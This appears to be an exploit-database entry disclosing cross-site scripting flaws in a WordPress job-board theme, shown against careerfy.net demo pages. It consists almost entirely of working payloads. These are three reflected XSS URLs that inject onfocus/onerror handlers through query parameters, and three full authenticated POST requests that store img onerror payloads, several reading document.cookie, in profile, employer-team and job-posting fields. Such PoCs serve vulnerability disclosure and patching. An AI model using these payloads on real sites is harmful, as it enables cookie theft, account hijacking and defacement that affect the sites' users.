## https://sploitus.com/exploit?id=WPEX-ID:10291
### [ PoC Unauthenticated Reflected XSS (via the `location` and `sector_cat` query parameters): ]

https://careerfy.net/petcare/find-help/?location=%22%20autofocus%20onfocus=alert(`XSS`);%20%22%3E&loc_radius=50

https://careerfy.net/careerbooster/jobs-listing/?search_title=&loc_radius=50&location=%22+autofocus+onfocus%3Dalert%28%60XSS%60%29%3E&sector_cat=&job_type=part-time

https://careerfy.net/careerbooster/jobs-listing/?sector_cat=1%22--%3E%3C!--%3Cimg%20src=%22--%3E%22%3E%3Cimg%20src=x%20onerror=alert(`XSS`);%3E



### [ PoC Authenticated Persistent XSS -> Candidate User Profile (payloads in the `academic-level`, `Age`, `salary`, `gender`, `industry` and `jobsearch_field_location_address` fields): ]

[!] POST /petcare/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------122256774439635172062989578806
Content-Length: 5335
Origin: https://careerfy.net
Referer: https://careerfy.net/petcare/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_cvr_photo_cand"; filename=""
Content-Type: application/octet-stream


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_user_dob_whole"

01-07-2020
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_phone"

OK
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="dial_code"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_sector"

41
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle"

XSS
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_type"

type_1
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_currency"

default
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_pos"

left
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_sep"

,
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_deci"

2
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_bio"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="academic-level"

masters-degree"><img src=x onerror=alert(document.cookie);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="Age"

18-22-years"><img src=x onerror=alert(document.domain);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="salary"

1337"><img src=x onerror=alert(`XSS`);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="gender"

hacker"><img src=x onerror=alert(`YAY!`);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="industry"

web-security"><img src=x onerror=alert(`XSS`);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="cand_user_facebook_url"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="cand_user_twitter_url"

https://twitter.com/vlad_vector
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="cand_user_linkedin_url"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="cand_user_dribbble_url"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_location1"

Russian Federation
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_location2"

Moscow
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_address"

1337"><img src=x onerror=alert(`XSS`);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_lat"

0
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_lng"

0
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

0
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------122256774439635172062989578806--



### [ PoC Authenticated Persistent XSS -> Employer Profile (payloads in the `dial_code`, `jobsearch_field_location_address` and `jobsearch_field_team_*[]` fields): ]

[!] POST /careerbooster/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------207058957013654520581670329262
Content-Length: 5853
Origin: https://careerfy.net
Referer: https://careerfy.net/careerbooster/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_cvr_photo"; filename=""
Content-Type: application/octet-stream


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="display_name"

PoC
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_phone"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="dial_code"

1"--><!--<img src="-->"><img src=x onerror=alert(`XSS`);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="contry_iso_code"

ru
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_website"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_sector"

33
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_dob_mm"

7
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_dob_dd"

1
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_dob_yy"

2020
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_bio"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="founded-since"

2018
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="emp_user_facebook_url"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="emp_user_twitter_url"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="emp_user_linkedin_url"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="emp_user_dribbble_url"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_location1"

Russian Federation
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_location2"

Moscow
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_location3"

Moscow
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_address"

OK"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_lat"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_lng"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: image/jpeg


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_title[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_designation[]"

1337"><img src=x onerror=alert(document.domain);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_experience[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_image[]"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_facebook[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_google[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_twitter[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_linkedin[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_description[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="terms_cond_check"

on
-----------------------------207058957013654520581670329262--



### [ PoC Authenticated Persistent XSS -> Job Page (payloads in the `application_deadline`, `get_job_skills[]`, `job_apply_type`, `career-level`, `experience`, `gender`, `Industry`, `qualifications` and `jobsearch_field_location_address` fields): ]

[!] POST /careerbooster/user-dashboard/?tab=user-job&job_id=5038&action=update HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------5410881451781327061235735546
Content-Length: 4680
Origin: https://careerfy.net
Referer: https://careerfy.net/careerbooster/user-dashboard/?tab=user-job&job_id=5038&action=update
Cookie: [cookies_here]

-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_detail"

PoC
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="application_deadline"

July 2, 2020 2:48 pm"><img src=x onerror=alert(document.cookie);>
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_sector"

33
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_type"

21
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="get_job_skills[]"

Developer"><img src=x onerror="alert(document.cookie);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_apply_type"

internal"><img src=x onerror="alert(document.cookie);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_apply_url"


-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_apply_email"


-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_type"

type_1
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary"

13
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_max_salary"

13
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_currency"

default
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_pos"

left
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_sep"

,
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_deci"

2
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="offered-salary"


-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="career-level"

officer"><img src=x onerror="alert(document.domain);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="experience"

less-than-1-year"><img src=x onerror="alert(document.cookie);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="gender"

male"><img src=x onerror="alert(document.domain);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="Industry"

development"><img src=x onerror="alert(document.cookie);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="qualifications"

certificate"><img src=x onerror=alert(document.domain); >
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_attach_files[]"; filename=""
Content-Type: application/octet-stream


-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_location1"

Russian Federation
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_location2"

Moscow
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_location3"

Moscow
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_address"

1337"><img src=x onerror=alert(`XSS`); >
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_lat"

55.761035
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_lng"

37.536004
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

9.719789233510344
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="user_job_posting"

1
-----------------------------5410881451781327061235735546--